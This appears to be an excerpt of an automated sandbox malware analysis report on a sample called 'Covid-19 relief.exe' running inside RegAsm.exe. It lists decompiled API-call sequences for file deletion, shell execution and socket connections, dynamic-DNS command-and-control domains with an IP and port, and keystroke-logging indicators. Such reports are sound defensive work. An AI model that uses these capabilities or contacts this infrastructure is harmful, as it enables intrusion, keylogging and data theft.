            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr5_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,5_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE5_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,5_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha2_2_00403C4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha2_2_00403C4A

            Networking:

            barindex
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: chaseric.ddns.net
            Source: unknownDNS query: name: chaseric.ddns.net
            Source: global trafficTCP traffic: 192.168.2.4:49738 -> 194.5.97.21:24002
            Source: global trafficTCP traffic: 192.168.2.4:49738 -> 194.5.97.21:24002
            Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
            Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_00402149
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_00402149
            Source: unknownDNS traffic detected: queries for: chaseric.hopto.org
            Source: unknownDNS traffic detected: queries for: chaseric.hopto.org
            Source: Covid-19 relief.exeString found in binary or memory: https://login.microsoftonline.com
            Source: Covid-19 relief.exeString found in binary or memory: https://management.azure.com/
            Source: Covid-19 relief.exeString found in binary or memory: https://management.azure.com/Chttps://login.microsoftonline.com
            Source: Covid-19 relief.exeString found in binary or memory: https://management.azure.com/subscriptions/
            Source: Covid-19 relief.exeString found in binary or memory: https://login.microsoftonline.com
            Source: Covid-19 relief.exeString found in binary or memory: https://management.azure.com/
            Source: Covid-19 relief.exeString found in binary or memory: https://management.azure.com/Chttps://login.microsoftonline.com
            Source: Covid-19 relief.exeString found in binary or memory: https://management.azure.com/subscriptions/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Contains functionality to capture and log keystrokesShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Esc] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Enter] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Tab] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Down] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Right] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Up] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Left] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [End] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [F2] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [F1] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Del] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Del] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Esc] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Enter] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Tab] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Down] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Right] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Up] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Left] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [End] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [F2] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [F1] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Del] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Del] 2_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Esc] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Enter] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Tab] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Down] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Right] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Up] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Left] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [End] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [F2] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [F1] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Del] 5_2_00405EB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: [Del] 5_2_00405EB2
